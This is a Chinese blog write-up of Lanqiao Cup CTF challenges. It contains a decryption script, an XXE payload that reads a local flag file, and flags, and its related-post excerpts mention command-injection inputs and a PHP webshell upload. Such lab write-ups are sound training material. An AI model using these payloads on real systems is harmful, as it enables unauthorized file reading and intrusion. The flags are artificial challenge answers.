加载中...

蓝桥杯-WP

发表于2025-04-26|更新于2025-04-27|赛题wp

|总字数:251|阅读时长:1分钟|浏览量:

黑客密室逃脱

找到字符串d9d1c4d9e0aac2ccc8b162656c5eac9796ab92a88f9e9ba694686692a0999ad5c8dac5a097df696898ae

爆破得name=app.py获得加密函数

访问name=hidden.txt获得密钥secret_key2031，通过python脚本获得flag

import binascii

def decrypt(encrypted_str, secret_key):
    key_ascii = [ord(c) for c in secret_key]
    binary_data = binascii.unhexlify(encrypted_str)
    byte_list = list(binary_data)
    plaintext = bytearray()
    for i in range(len(byte_list)):
        decrypted_byte = byte_list[i] - key_ascii[i % len(key_ascii)]
        plaintext.append(decrypted_byte)
    return plaintext.decode('latin-1')

if __name__ == "__main__":
    encryption_key = "secret_key2031"
    encrypted_sensitive_info = "d9d1c4d9e0aac2ccc8b162656c5eac9796ab92a88f9e9ba694686692a0999ad5c8dac5a097df696898ae"
    plain_text = decrypt(encrypted_sensitive_info, encryption_key)
    print(plain_text)

flag{6cac8059-9239-4036-b83a-47ccff52f78e}

flowzip

提取并解压所有压缩包，然后通过文件查找获得flag文件

flag{c6db63e6-6459-4e75-bb37-3aec5d2b947b}

Enigma

重新进行一次编码获得原始数据

flag{HELLOCTFERTHISISAMESSAGEFORYOU}

ezEvtx

找到警告文件即为敏感文件

flag{confidential.docx}

星际XML解析器

看名字推测是xxe漏洞，直接读flag

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ENTITY xxe SYSTEM "file:///flag">
]>
<root>
<data>&xxe;</data>
</root>

flag{f3af2b65-b3c8-4bd7-bdb8-64c069382be8}

ShadowPhases

三段动态调试获得flag

flag{0fa830e7-b699-4513-8e01-51f35b0f3293}

文章作者: yxing

文章链接: http://yxing-1.github.io/2025/04/26/蓝桥杯-WP/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Yxing！

相关推荐

WEBnot so web 1题目先随便注册登录进入后base64解码得到源码 import base64, json, timeimport os, sys, binasciifrom dataclasses import dataclass, asdictfrom typing import Dict, Tuplefrom secret import KEY, ADMIN_PASSWORDfrom Crypto.Cipher import AESfrom Crypto.Util.Padding import pad, unpadfrom flask import ( Flask, render_template, render_template_string, request, redirect, url_for, flash, session,)app = Flask(__name__)app.secret_key = KEY@dataclass(kw_only=True)class APPUser: name:...

2024HTTP 是什么呀常规的GET，POST传参，改cookie,referer,UA,IP，注意这里如果是GET传参要传入%00，就要先url编码一次，即传入%2500，因为浏览器会自动进行一次url解码 GET /?basectf=we1c%2500me POST Base=fl@gCookie: c00k13=i can't eat itUser-Agent: BaseReferer: BaseX-Forwarded-For:127.0.0.1 base64解码即可喵喵喵´•ﻌ•`直接GET传参 DT=system('ls /');DT=system('cat /flag'); md5绕过欸直接数组绕过即可，注意第二层为强比较，也可用数组绕过 GET:name[]=1&name2[]=2Post:password[]=3&password2[]=4 A Dark Room源码 upload写个一句话木马存为1.php上传，bp抓包修改文件类型为Content-Type:...

WEBpop<?phpclass A1{ public $a1;}class A2{ public $a2 = '10086';}class A3{ public $a3;}class A4{ public $a4;}$a=new A1();$a->a1=new A2();$a->a1->a2=new A3();$a->a1->a2->a3=new A4();echo...

WEBWelcome ！！ ctbuctf{we1c0me_t0_CT9UC7F2025} Sql_No_map…?原先还在自己测，结果发现目录有东西…… //index.php<?phprequire 'lib.php';header("Content-Type: text/html; charset=utf-8");$err = '';$selected_id = $_GET['id'] ?? '';$selected_article = null;// 获取文章列表$list_sql = "SELECT id, title FROM article ORDER BY id ASC"; //升序排列$list_res = db()->query($list_sql);$articles = [];while ($row = $list_res->fetch_assoc()) { $articles[]...

Hackergame复现

签到错误输入一次后在url框中发现false，修改为true后获得flag 喜欢做签到的 CTFer 你们好呀题目要求ctf战队招新网站，在承办单位中找到，进去后为Linux终端 flag1通过help命令找出可用命令，再用ls -la命令找到隐藏的.flag文件，cat .flag获得 flag{0k_175_a_h1dd3n_s3c3rt_f14g___please_join_us_ustc_nebula_anD_two_maJor_requirements_aRe_shown_somewhere_else} flag2输出.oh-you-found-it的内容，提示考虑其他目录，进入Awards时提示要管理员权限，但是sudo...

数据加载中